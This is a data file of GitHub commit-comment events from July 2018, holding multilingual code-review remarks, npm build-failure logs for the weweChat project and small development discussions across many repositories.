{"id":"8015979911","type":"CommitCommentEvent","actor":{"login":"zh-wj"},"repo":{"name":"trazyn/weweChat"},"payload":{"comment":{"id":29827887,"position":null,"line":null,"path":null,"commit_id":"6e10cbe7605a0a413b8b02d1bbc6a5f67f6efc09","created_at":"2018-07-25T11:55:22Z","updated_at":"2018-07-25T11:55:22Z","author_association":"NONE","body":"在架梯子  看情况速度应该可能快点 ，等下晚点打个包看下行不行。 \r\n\r\n\r\n \r\n \r\n------------------ Original ------------------\r\nFrom:  \"Zimo\"<zhangwenjun@5iketang.com>;\r\nDate:  Wed, Jul 25, 2018 07:45 PM\r\nTo:  \"trazyn/weweChat\"<reply@reply.github.com>; \"trazyn/weweChat\"<weweChat@noreply.github.com>; \r\nCc:  \"Mention\"<mention@noreply.github.com>; \r\nSubject:  Re: [trazyn/weweChat] Fix #150 #149 (6e10cbe)\r\n\r\n \r\nnpm install && npm run package-linux    ???  \r\n\r\n\r\n\r\n\r\n国内git clone  速度肉的要死。    而且\r\n[zimo@zh weweChat-dev]$ whereis npm \r\nnpm: /usr/bin/npm /usr/local/bin/npm /usr/share/man/man1/npm.1.gz\r\n[zimo@zh weweChat-dev]$ npm -v \r\n3.10.10\r\n[zimo@zh weweChat-dev]$ /usr/local/bin/npm -v \r\n6.1.0\r\n[zimo@zh weweChat-dev]$ /usr/local/bin/npm  install \r\nnpm WARN deprecated babel-preset-es2015@6.24.1:   Thanks for using Babel: we recommend using babel-preset-env now: please read babeljs.io/env to update! \r\nnpm WARN deprecated postcss-cssnext@3.1.0: 'postcss-cssnext' has been deprecated in favor of 'postcss-preset-env'. Read more at https://moox.io/blog/deprecating-cssnext/\r\nnpm WARN deprecated browserslist@2.11.3: Browserslist 2 could fail on reading Browserslist >3.0 config used in other tools.\r\n\r\n\r\n> husky@0.14.3 install /home/zimo/Downloads/weweChat-dev/node_modules/husky\r\n> node ./bin/install.js\r\n\r\n\r\nhusky\r\nsetting up Git hooks\r\ncan't find .git directory, skipping Git hooks installation\r\n\r\n\r\n> electron@2.0.5 postinstall /home/zimo/Downloads/weweChat-dev/node_modules/electron\r\n> node install.js\r\n\r\n\r\nnpm notice created a lockfile as package-lock.json. You should commit this file.\r\nnpm WARN react-addons-css-transition-group@15.6.2 requires a peer of react@^15.4.2 but none is installed. You must install peer dependencies yourself.\r\nnpm WARN extract-text-webpack-plugin@3.0.2 requires a peer of webpack@^3.1.0 but none is installed. You must install peer dependencies yourself.\r\nnpm WARN ajv-keywords@3.2.0 requires a peer of ajv@^6.0.0 but none is installed. You must install peer dependencies yourself.\r\nnpm WARN optional SKIPPING OPTIONAL DEPENDENCY: fsevents@1.2.4 (node_modules/fsevents):\r\nnpm WARN notsup SKIPPING OPTIONAL DEPENDENCY: Unsupported platform for fsevents@1.2.4: wanted {\"os\":\"darwin\",\"arch\":\"any\"} (current: {\"os\":\"linux\",\"arch\":\"x64\"})\r\n\r\n\r\nadded 1605 packages from 925 contributors and audited 14249 packages in 79.734s\r\nfound 1 moderate severity vulnerability\r\n  run `npm audit fix` to fix them, or `npm audit` for details\r\n\r\n\r\n\r\n 心里有点略略的难受\r\n\r\n\r\n \r\n------------------ Original ------------------\r\nFrom:  \"trazyn\"<notifications@github.com>;\r\nDate:  Wed, Jul 25, 2018 07:37 PM\r\nTo:  \"trazyn/weweChat\"<weweChat@noreply.github.com>; \r\nCc:  \"Zimo\"<zhangwenjun@5iketang.com>; \"Mention\"<mention@noreply.github.com>; \r\nSubject:  Re: [trazyn/weweChat] Fix #150 #149 (6e10cbe)\r\n\r\n \r\n\r\n克隆代码到本地\r\n npm i npm run package-linux  \r\n就能自己打包，只是依赖安装国内会很慢吧\r\n \r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-25T11:55:22Z"}
{"id":"8015981187","type":"CommitCommentEvent","actor":{"login":"Zeliboba5"},"repo":{"name":"Zeliboba5/tortoise-orm"},"payload":{"comment":{"id":29827890,"position":7,"line":74,"path":"docs/models.rst","commit_id":"e472e10a1dda9448551a527a82ce11c363ba5907","created_at":"2018-07-25T11:55:39Z","updated_at":"2018-07-25T11:55:39Z","author_association":"OWNER","body":"May be currently we should force setting `id` field on the models? Because inner implementations using `id` field all over the place and setting another field name for pk will ruin everything.\r\nIt made me realise why django needed separate `pk` reference field :)"}},"created_at":"2018-07-25T11:55:39Z"}
{"id":"8015988143","type":"CommitCommentEvent","actor":{"login":"yansovanareak"},"repo":{"name":"zhukov/webogram"},"payload":{"comment":{"id":29827900,"position":null,"line":null,"path":null,"commit_id":"0af89fa6d21cb943afbbda87f00faf326f8a8505","created_at":"2018-07-25T11:57:09Z","updated_at":"2018-07-25T11:57:09Z","author_association":"NONE","body":"0af89fa"}},"created_at":"2018-07-25T11:57:09Z"}
{"id":"8015990052","type":"CommitCommentEvent","actor":{"login":"stepanblyschak"},"repo":{"name":"stepanblyschak/sonic-mgmt"},"payload":{"comment":{"id":29827904,"position":4,"line":30,"path":"ansible/roles/test/files/ptftests/IP_decap_test.py","commit_id":"2c967d239e05ea9c6a474b11f0ce59c19bbd714b","created_at":"2018-07-25T11:57:34Z","updated_at":"2018-07-25T11:57:34Z","author_association":"OWNER","body":"not needed, remove"}},"created_at":"2018-07-25T11:57:34Z"}
{"id":"8015994763","type":"CommitCommentEvent","actor":{"login":"phoebusryan"},"repo":{"name":"DonLoron/media_type_manager"},"payload":{"comment":{"id":29827911,"position":4,"line":23,"path":"boot.php","commit_id":"f6cfe1d1887da9918d27709d9df417ecf6fc6a2a","created_at":"2018-07-25T11:58:33Z","updated_at":"2018-07-25T11:58:33Z","author_association":"NONE","body":"`if (rex_addon::get('useragent')->isAvailable()) {`\r\n\r\nwäre womöglich die bessere Wahl, oder?"}},"created_at":"2018-07-25T11:58:33Z"}
{"id":"8016002049","type":"CommitCommentEvent","actor":{"login":"pawosm-arm"},"repo":{"name":"flang-compiler/flang"},"payload":{"comment":{"id":29827928,"position":null,"line":null,"path":null,"commit_id":"7da0254f387a2e10abbf0b6689c62528c6c1bade","created_at":"2018-07-25T12:00:06Z","updated_at":"2018-07-25T12:00:06Z","author_association":"CONTRIBUTOR","body":"This patch loses whatever debug info we had for a module variable."}},"created_at":"2018-07-25T12:00:06Z"}
{"id":"8016003958","type":"CommitCommentEvent","actor":{"login":"markaren"},"repo":{"name":"Microsoft/vcpkg"},"payload":{"comment":{"id":29827934,"position":6,"line":18,"path":"ports/thrift/portfile.cmake","commit_id":"86fecfc61c3b9b0f5e93b47e4c5d807322e08847","created_at":"2018-07-25T12:00:26Z","updated_at":"2018-07-25T12:00:26Z","author_association":"NONE","body":"Is it not better to target a release build (v0.11.0 - commit: 0d8da22dba430c379de04ff48e507e7277f4ea21) instead of a development build?\r\nFor instance, the compiler we get via vcpkg is not source code compatible with Thrift 0.11.0 for Java. There are probably other issues with clients and servers written in other languages that are going to use the stable 0.11.0 release.."}},"created_at":"2018-07-25T12:00:26Z"}
{"id":"8016007628","type":"CommitCommentEvent","actor":{"login":"AnnieYousar"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29827939,"position":null,"line":null,"path":null,"commit_id":"7953d3e31b048478ca56bd1239ccf00dd09dbbbe","created_at":"2018-07-25T12:01:09Z","updated_at":"2018-07-25T12:01:09Z","author_association":"NONE","body":"Your proposal is better. BTW I would support a backporting of this request."}},"created_at":"2018-07-25T12:01:09Z"}
{"id":"8016008897","type":"CommitCommentEvent","actor":{"login":"hankuu"},"repo":{"name":"hankuu/tuuliviiri"},"payload":{"comment":{"id":29827941,"position":null,"line":null,"path":null,"commit_id":"03393740f32e401dfffcd301f95df37249ae3701","created_at":"2018-07-25T12:01:24Z","updated_at":"2018-07-25T12:01:24Z","author_association":"OWNER","body":"tähän palataan, mutta miten?"}},"created_at":"2018-07-25T12:01:24Z"}
{"id":"8016012473","type":"CommitCommentEvent","actor":{"login":"bakersdozen"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29827946,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T12:02:10Z","updated_at":"2018-07-25T12:02:10Z","author_association":"NONE","body":"Cinelog-c is more of a profile than a lut. It would be the first thing to add in the workflow."}},"created_at":"2018-07-25T12:02:10Z"}
{"id":"8016012792","type":"CommitCommentEvent","actor":{"login":"afshaan4"},"repo":{"name":"afshaan4/ShakyRoads"},"payload":{"comment":{"id":29827947,"position":null,"line":null,"path":null,"commit_id":"94849a90ead3a8b247978fbded350c96b44ebcd2","created_at":"2018-07-25T12:02:13Z","updated_at":"2018-07-25T12:02:13Z","author_association":"OWNER","body":"So apparently gitignore is broken here\r\n"}},"created_at":"2018-07-25T12:02:13Z"}
{"id":"8016014803","type":"CommitCommentEvent","actor":{"login":"charlypro123"},"repo":{"name":"charlypro123/MarvelFanApp"},"payload":{"comment":{"id":29827952,"position":null,"line":null,"path":null,"commit_id":"a154b96c5b2ca99f3a9c868dba0296e9294f6df4","created_at":"2018-07-25T12:02:38Z","updated_at":"2018-07-25T12:02:38Z","author_association":"OWNER","body":"I change version of sdk 28 to 27, because 28 send me an error when I create new toolbar\r\n-android/view/view$onUnhandledKeyEventListener (onMeasure error)"}},"created_at":"2018-07-25T12:02:38Z"}
{"id":"8016015048","type":"CommitCommentEvent","actor":{"login":"danielrutter"},"repo":{"name":"danielrutter/UGPLAT"},"payload":{"comment":{"id":29827954,"position":null,"line":null,"path":null,"commit_id":"38a386f8f194a1f46b2b7efb8d1417c7fb405f88","created_at":"2018-07-25T12:02:41Z","updated_at":"2018-07-25T12:02:41Z","author_association":"OWNER","body":"Added GitHub URL/Link for current official GitHub Depository for UGPLAT."}},"created_at":"2018-07-25T12:02:41Z"}
{"id":"8016018516","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29827958,"position":null,"line":null,"path":null,"commit_id":"2d2a7571b82535757f95a0d416b6f7d224e5293e","created_at":"2018-07-25T12:03:19Z","updated_at":"2018-07-25T12:03:19Z","author_association":"OWNER","body":"@cnuke: please add to your dde_linux_update branch"}},"created_at":"2018-07-25T12:03:19Z"}
{"id":"8016018735","type":"CommitCommentEvent","actor":{"login":"danielrutter"},"repo":{"name":"danielrutter/UGPLAT"},"payload":{"comment":{"id":29827959,"position":null,"line":null,"path":null,"commit_id":"c1a79b374e363f464dae3b9e9c0a955bdaee32cf","created_at":"2018-07-25T12:03:21Z","updated_at":"2018-07-25T12:03:21Z","author_association":"OWNER","body":"Added the first ever released version of UGPLAT PRE-ALPHA 0.01."}},"created_at":"2018-07-25T12:03:21Z"}
{"id":"8016020242","type":"CommitCommentEvent","actor":{"login":"DonLoron"},"repo":{"name":"DonLoron/media_type_manager"},"payload":{"comment":{"id":29827961,"position":4,"line":23,"path":"boot.php","commit_id":"f6cfe1d1887da9918d27709d9df417ecf6fc6a2a","created_at":"2018-07-25T12:03:39Z","updated_at":"2018-07-25T12:03:39Z","author_association":"OWNER","body":"danke für den hinweis!"}},"created_at":"2018-07-25T12:03:39Z"}
{"id":"8016022165","type":"CommitCommentEvent","actor":{"login":"jannes-m"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29827963,"position":null,"line":null,"path":null,"commit_id":"6ebd051051ebad75b3ed499a73525e81a60548fb","created_at":"2018-07-25T12:04:02Z","updated_at":"2018-07-25T12:04:02Z","author_association":"COLLABORATOR","body":"ah, yeah, perfect, thanks, could have thought of this as well!!"}},"created_at":"2018-07-25T12:04:02Z"}
{"id":"8016022183","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29827964,"position":null,"line":null,"path":null,"commit_id":"f354740abc3c6445c6f0ed8d62f10f3fc84386a3","created_at":"2018-07-25T12:04:03Z","updated_at":"2018-07-25T12:04:03Z","author_association":"NONE","body":"Congrats! I still have a big feeling that there is more elo in this stats stuff :)"}},"created_at":"2018-07-25T12:04:03Z"}
{"id":"8016022587","type":"CommitCommentEvent","actor":{"login":"danielrutter"},"repo":{"name":"danielrutter/UGPLAT"},"payload":{"comment":{"id":29827968,"position":null,"line":null,"path":null,"commit_id":"8037eb4c0431fcc555e766286f744f441eb77dcd","created_at":"2018-07-25T12:04:07Z","updated_at":"2018-07-25T12:04:07Z","author_association":"OWNER","body":"Added the official licence agreement for all developers/uses of the platform code etc."}},"created_at":"2018-07-25T12:04:07Z"}
{"id":"8016023548","type":"CommitCommentEvent","actor":{"login":"trazyn"},"repo":{"name":"trazyn/weweChat"},"payload":{"comment":{"id":29827970,"position":null,"line":null,"path":null,"commit_id":"6e10cbe7605a0a413b8b02d1bbc6a5f67f6efc09","created_at":"2018-07-25T12:04:18Z","updated_at":"2018-07-25T12:04:18Z","author_association":"OWNER","body":"等下发你邮箱"}},"created_at":"2018-07-25T12:04:18Z"}
{"id":"8016023886","type":"CommitCommentEvent","actor":{"login":"devonestes"},"repo":{"name":"levelhq/level"},"payload":{"comment":{"id":29827971,"position":5,"line":38,"path":"script/bootstrap","commit_id":"6a7eff5e199cf78bdfda80bbaef38c09640e598d","created_at":"2018-07-25T12:04:22Z","updated_at":"2018-07-25T12:04:22Z","author_association":"CONTRIBUTOR","body":"Oh boy, configuration is a _big_ ongoing issue.\r\n\r\nI'd say that for now, this is just fine.\r\n\r\nBut also, given the way the core team and community are going, if you _can_ have something as an environment variable that can be accessed at runtime instead of in Mix config, then that might be preferable in the long term. That seems to be the one consensus that's been reached recently - prefer runtime environment variables over Mix config. Basically that's because this idea works with releases, and that's the direction that people are trying to go in terms of deployment going forward (for many reasons).\r\n\r\nHowever, that tooling might still be 6-12 months away, and honestly the migration wouldn't be too hard to do later."}},"created_at":"2018-07-25T12:04:22Z"}
{"id":"8016024768","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29827974,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T12:04:33Z","updated_at":"2018-07-25T12:04:33Z","author_association":"COLLABORATOR","body":"Sure... the same like all the others... but I need it as LUT or function to convert it to anything we can work with."}},"created_at":"2018-07-25T12:04:33Z"}
{"id":"8016026288","type":"CommitCommentEvent","actor":{"login":"reichley"},"repo":{"name":"Dafang-Hacks/spiflasher"},"payload":{"comment":{"id":29827982,"position":null,"line":null,"path":null,"commit_id":"f83942722415dd87027365726a62a74d06d7602f","created_at":"2018-07-25T12:04:54Z","updated_at":"2018-07-25T12:04:54Z","author_association":"NONE","body":"haha. Sorry, COMPLETELY overlooked it. Once the flash is complete and I recover my Wyzecam V2 from the \"dead,\" would you be interested in me posting a tutorial on flashing the NAND with a raspberry pi (no spi programmer needed)?"}},"created_at":"2018-07-25T12:04:54Z"}
{"id":"8016029789","type":"CommitCommentEvent","actor":{"login":"micabe"},"repo":{"name":"instructure/instructure-ui"},"payload":{"comment":{"id":29827991,"position":7,"line":65,"path":"packages/__docs__/package.json","commit_id":"d49430f4757b4d42578ac43d05bbd548d54003e5","created_at":"2018-07-25T12:05:35Z","updated_at":"2018-07-25T12:05:35Z","author_association":"NONE","body":"Hello @junyper ,\r\n\r\nGood practices want you not to include the popular libs such as `react`, `react-dom`, `moment` in `peerDependencies` rather than in `dependencies` and let the end user do the lib upgrade manually... see: https://github.com/facebook/prop-types/issues/44"}},"created_at":"2018-07-25T12:05:35Z"}
{"id":"8016031240","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29827997,"position":null,"line":null,"path":null,"commit_id":"89a81e72cce0858e6493af606597aa275b68f7a3","created_at":"2018-07-25T12:05:54Z","updated_at":"2018-07-25T12:05:54Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-25T12:05:54Z"}
{"id":"8016033794","type":"CommitCommentEvent","actor":{"login":"bakersdozen"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29828003,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T12:06:27Z","updated_at":"2018-07-25T12:06:27Z","author_association":"NONE","body":"Okay I need to have a look at my folders and will get back to you."}},"created_at":"2018-07-25T12:06:27Z"}
{"id":"8016034859","type":"CommitCommentEvent","actor":{"login":"metaphorizer"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29828008,"position":8,"line":8,"path":"1/right_triangle.rb","commit_id":"f7ba953fe24675ba7cf3921b7a9fd877c5b9faed","created_at":"2018-07-25T12:06:41Z","updated_at":"2018-07-25T12:06:41Z","author_association":"OWNER","body":"отсортировал как:\r\nsides = [a, b, c].sort {|x, y| y <=> x }\r\nсаму конструкцию {|x, y| y <=> x } нашёл через гугл, но не смог найти её смысла, подскажите, пожалуйста, в чём её суть?"}},"created_at":"2018-07-25T12:06:41Z"}
{"id":"8016036744","type":"CommitCommentEvent","actor":{"login":"jdbdr"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":29828012,"position":null,"line":null,"path":null,"commit_id":"560f685ff9250f413cd76e98cd3b5791ed374f51","created_at":"2018-07-25T12:07:05Z","updated_at":"2018-07-25T12:07:05Z","author_association":"NONE","body":"this fix should be:\r\n`memset(context, 0, sizeof(AccessControlContext));`"}},"created_at":"2018-07-25T12:07:05Z"}
{"id":"8016037248","type":"CommitCommentEvent","actor":{"login":"metaphorizer"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29828015,"position":31,"line":31,"path":"1/right_triangle.rb","commit_id":"f7ba953fe24675ba7cf3921b7a9fd877c5b9faed","created_at":"2018-07-25T12:07:11Z","updated_at":"2018-07-25T12:07:11Z","author_association":"OWNER","body":"согласен, из фразы так и следует. внёс изменения."}},"created_at":"2018-07-25T12:07:11Z"}
{"id":"8016037594","type":"CommitCommentEvent","actor":{"login":"swernerx"},"repo":{"name":"robertklep/node-metrohash"},"payload":{"comment":{"id":29828018,"position":5,"line":8,"path":"package.json","commit_id":"bc57e315be6c459f0036006e441a277349cf9b4d","created_at":"2018-07-25T12:07:16Z","updated_at":"2018-07-25T12:07:16Z","author_association":"NONE","body":"There should be no need for doing this. Simply \"mocha test.js\" should be enough on all OSes."}},"created_at":"2018-07-25T12:07:16Z"}
{"id":"8016038724","type":"CommitCommentEvent","actor":{"login":"fathyb"},"repo":{"name":"parcel-bundler/parcel"},"payload":{"comment":{"id":29828020,"position":null,"line":null,"path":null,"commit_id":"3e9b086482fe069d42225cc327de903ba8be7ca2","created_at":"2018-07-25T12:07:28Z","updated_at":"2018-07-25T12:07:28Z","author_association":"MEMBER","body":"This is about the `module` options (not to confuse with `target`), anything else than `import`/`export` is unchanged.\r\nUse `target: esnext` and [this workaround](https://github.com/parcel-bundler/parcel/issues/1207#issuecomment-382027330) to build pure ES6 apps."}},"created_at":"2018-07-25T12:07:28Z"}
{"id":"8016042165","type":"CommitCommentEvent","actor":{"login":"mmroz"},"repo":{"name":"themaplelab/swift"},"payload":{"comment":{"id":29828022,"position":null,"line":null,"path":null,"commit_id":"3bc6c2e3bd57e1709b6ad60e05dec6930c2d4024","created_at":"2018-07-25T12:08:09Z","updated_at":"2018-07-25T12:08:09Z","author_association":"NONE","body":"Looks good to me!\r\n"}},"created_at":"2018-07-25T12:08:09Z"}
{"id":"8016043082","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29828023,"position":null,"line":null,"path":null,"commit_id":"db1d3282b3a10309a24e2fb2cf07c52bd19be313","created_at":"2018-07-25T12:08:19Z","updated_at":"2018-07-25T12:08:19Z","author_association":"OWNER","body":"This looks great.  A class is the wrong implementation for something so simple.  Your implementation follows our current design.\r\n\r\nNo, you don't need to comment every line.  When Drasil generates code, we could consider turning this level of commenting on or off, but it is far too difficult to maintain by hand."}},"created_at":"2018-07-25T12:08:19Z"}
{"id":"8016046119","type":"CommitCommentEvent","actor":{"login":"Sivaperuman174"},"repo":{"name":"Sivaperuman174/Angular4Tutorials"},"payload":{"comment":{"id":29828028,"position":null,"line":null,"path":null,"commit_id":"7fb8b33822e6e6beabbf2af15bd7bceb2828ace3","created_at":"2018-07-25T12:08:55Z","updated_at":"2018-07-25T12:08:55Z","author_association":"OWNER","body":"intial commit"}},"created_at":"2018-07-25T12:08:55Z"}
{"id":"8016046249","type":"CommitCommentEvent","actor":{"login":"lanhuong94"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29828029,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T12:08:56Z","updated_at":"2018-07-25T12:08:56Z","author_association":"NONE","body":"project very good"}},"created_at":"2018-07-25T12:08:56Z"}
{"id":"8016051708","type":"CommitCommentEvent","actor":{"login":"Duke7467"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29828033,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T12:10:03Z","updated_at":"2018-07-25T12:10:03Z","author_association":"NONE","body":"it is good proj."}},"created_at":"2018-07-25T12:10:03Z"}
{"id":"8016057290","type":"CommitCommentEvent","actor":{"login":"stepanblyschak"},"repo":{"name":"stepanblyschak/sonic-mgmt"},"payload":{"comment":{"id":29828039,"position":76,"line":119,"path":"ansible/roles/test/files/ptftests/IP_decap_test.py","commit_id":"2c967d239e05ea9c6a474b11f0ce59c19bbd714b","created_at":"2018-07-25T12:11:10Z","updated_at":"2018-07-25T12:11:10Z","author_association":"OWNER","body":"create_ipv6_inner_pkt_only"}},"created_at":"2018-07-25T12:11:10Z"}
{"id":"8016060855","type":"CommitCommentEvent","actor":{"login":"EliasKotlyar"},"repo":{"name":"Dafang-Hacks/spiflasher"},"payload":{"comment":{"id":29828045,"position":null,"line":null,"path":null,"commit_id":"f83942722415dd87027365726a62a74d06d7602f","created_at":"2018-07-25T12:11:56Z","updated_at":"2018-07-25T12:11:56Z","author_association":"CONTRIBUTOR","body":"Sure, just provide it as a Pull-Request. I know it can be done with any spi-programmer which can be use flashrom.  "}},"created_at":"2018-07-25T12:11:56Z"}
{"id":"8016062396","type":"CommitCommentEvent","actor":{"login":"fenderslave"},"repo":{"name":"jariz/react-native-fingerprint-android"},"payload":{"comment":{"id":29828048,"position":null,"line":null,"path":null,"commit_id":"c31790a477514d959f02d75e786cfba4d41c18af","created_at":"2018-07-25T12:12:15Z","updated_at":"2018-07-25T12:12:15Z","author_association":"NONE","body":"hallo @jariz can you show me how to use this component. The example project is out of date and cant be used in your new method. And your example on readme.md always show error"}},"created_at":"2018-07-25T12:12:15Z"}
{"id":"8016065360","type":"CommitCommentEvent","actor":{"login":"robertklep"},"repo":{"name":"robertklep/node-metrohash"},"payload":{"comment":{"id":29828050,"position":5,"line":8,"path":"package.json","commit_id":"bc57e315be6c459f0036006e441a277349cf9b4d","created_at":"2018-07-25T12:12:54Z","updated_at":"2018-07-25T12:12:54Z","author_association":"OWNER","body":"I assumed that `./node_modules/.bin` wouldn't be added to `$PATH` (or the Windows-equivalent), but it looks like it is! I'll fix this and push it in a future release."}},"created_at":"2018-07-25T12:12:54Z"}
{"id":"8016069808","type":"CommitCommentEvent","actor":{"login":"kiranbosco"},"repo":{"name":"benbalter/licensee"},"payload":{"comment":{"id":29828059,"position":null,"line":null,"path":null,"commit_id":"d606b06860fd290693280060faee9c61cbf41c4b","created_at":"2018-07-25T12:13:49Z","updated_at":"2018-07-25T12:13:49Z","author_association":"NONE","body":"ll"}},"created_at":"2018-07-25T12:13:49Z"}
{"id":"8016074259","type":"CommitCommentEvent","actor":{"login":"spodermenpls"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29828068,"position":null,"line":null,"path":null,"commit_id":"9a26baf5c1fc35ae3dc6d3af57a8c93cead73cc9","created_at":"2018-07-25T12:14:46Z","updated_at":"2018-07-25T12:14:46Z","author_association":"CONTRIBUTOR","body":"Solang der Code nicht darunter leidet.. 😄"}},"created_at":"2018-07-25T12:14:46Z"}
{"id":"8016077197","type":"CommitCommentEvent","actor":{"login":"suhinini"},"repo":{"name":"pac4j/play-pac4j"},"payload":{"comment":{"id":29828076,"position":68,"line":68,"path":"shared/src/main/java/org/pac4j/play/store/PlayCookieStore.java","commit_id":"05b057e38c6947fd537978e23dd12987ddfdd0a3","created_at":"2018-07-25T12:15:17Z","updated_at":"2018-07-25T12:15:17Z","author_association":"NONE","body":"This particular action breaks logout functionality for IndirectClient as it requires `idToken` to be available for a certain profile. Was it done as a temporary thing until proper encryption mechanism is implemented?"}},"created_at":"2018-07-25T12:15:17Z"}
{"id":"8016077244","type":"CommitCommentEvent","actor":{"login":"DBC201"},"repo":{"name":"DBC201/Number-guesser"},"payload":{"comment":{"id":29828077,"position":81,"line":210,"path":"main.c","commit_id":"1156f2f7e287496f9f8d330be8fa2270f87cee90","created_at":"2018-07-25T12:15:18Z","updated_at":"2018-07-25T12:15:18Z","author_association":"OWNER","body":"For debug"}},"created_at":"2018-07-25T12:15:18Z"}
{"id":"8016081706","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29828080,"position":5,"line":4,"path":"ruby_module_10/acсessors.rb","commit_id":"dadaad000d96d28c9f6711a41aa197a77f8939a8","created_at":"2018-07-25T12:16:14Z","updated_at":"2018-07-25T12:16:14Z","author_association":"NONE","body":"у тебя же нет этих методов, и строка эта не нужна"}},"created_at":"2018-07-25T12:16:14Z"}
{"id":"8016083018","type":"CommitCommentEvent","actor":{"login":"zh-wj"},"repo":{"name":"trazyn/weweChat"},"payload":{"comment":{"id":29828083,"position":null,"line":null,"path":null,"commit_id":"6e10cbe7605a0a413b8b02d1bbc6a5f67f6efc09","created_at":"2018-07-25T12:16:29Z","updated_at":"2018-07-25T12:16:29Z","author_association":"NONE","body":"thinks  \r\n\r\n\r\n先回家了，到家了看下  \r\n这边刚刚用 6.14的node \r\n\r\n\r\nnpm ERR! Linux 3.10.0-862.9.1.el7.x86_64\r\nnpm ERR! argv \"/usr/bin/node\" \"/bin/npm\" \"run\" \"package-linux\"\r\nnpm ERR! node v6.14.3\r\nnpm ERR! npm  v3.10.10\r\nnpm ERR! code ELIFECYCLE\r\nnpm ERR! wewechat@1.1.6 package-linux: `npm run build && rm -rf release && build --linux --projectDir ./dist`\r\nnpm ERR! Exit status 1\r\nnpm ERR! \r\nnpm ERR! Failed at the wewechat@1.1.6 package-linux script 'npm run build && rm -rf release && build --linux --projectDir ./dist'.\r\nnpm ERR! Make sure you have the latest version of node.js and npm installed.\r\nnpm ERR! If you do, this is most likely a problem with the wewechat package,\r\nnpm ERR! not with npm itself.\r\nnpm ERR! Tell the author that this fails on your system:\r\nnpm ERR!     npm run build && rm -rf release && build --linux --projectDir ./dist\r\nnpm ERR! You can get information on how to open an issue for this project with:\r\nnpm ERR!     npm bugs wewechat\r\nnpm ERR! Or if that isn't available, you can get their info via:\r\nnpm ERR!     npm owner ls wewechat\r\nnpm ERR! There is likely additional logging output above.\r\n\r\n\r\nnpm ERR! Please include the following file with any support request:\r\nnpm ERR!     /home/zimo/Downloads/weweChat/npm-debug.log\r\n[zimo@zh weweChat]$ \r\n\r\n\r\n\r\n\r\n换了 10.6 的之后  \r\n\r\n[zimo@zh weweChat]$ /usr/local/bin/npm  -v \r\n6.1.0\r\n[zimo@zh weweChat]$ /usr/local/bin/node -v \r\nv10.6.0\r\n[zimo@zh weweChat]$ \r\n\r\n然后就出现下面的错误，所以可以说本地打包失败了  。\r\nnpm ERR! code ELIFECYCLE\r\nnpm ERR! errno 1\r\nnpm ERR! wewechat@1.1.6 package-linux: `npm run build && rm -rf release && build --linux --projectDir ./dist`\r\nnpm ERR! Exit status 1\r\nnpm ERR! \r\nnpm ERR! Failed at the wewechat@1.1.6 package-linux script.\r\nnpm ERR! This is probably not a problem with npm. There is likely additional logging output above.\r\n\r\n\r\nnpm ERR! A complete log of this run can be found in:\r\nnpm ERR!     /home/zimo/.npm/_logs/2018-07-25T12_11_49_822Z-debug.log\r\n[zimo@zh weweChat]$ \r\n\r\n\r\n\r\n \r\n \r\n------------------ Original ------------------\r\nFrom:  \"trazyn\"<notifications@github.com>;\r\nDate:  Wed, Jul 25, 2018 08:04 PM\r\nTo:  \"trazyn/weweChat\"<weweChat@noreply.github.com>; \r\nCc:  \"Zimo\"<zhangwenjun@5iketang.com>; \"Mention\"<mention@noreply.github.com>; \r\nSubject:  Re: [trazyn/weweChat] Fix #150 #149 (6e10cbe)\r\n\r\n \r\n\r\n等下发你邮箱\r\n \r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-25T12:16:29Z"}
{"id":"8016083778","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29828085,"position":15,"line":39,"path":"ruby_module_10/acсessors.rb","commit_id":"dadaad000d96d28c9f6711a41aa197a77f8939a8","created_at":"2018-07-25T12:16:37Z","updated_at":"2018-07-25T12:16:37Z","author_association":"NONE","body":"и модуль пустой не нужен, можно удалять эти строки"}},"created_at":"2018-07-25T12:16:37Z"}
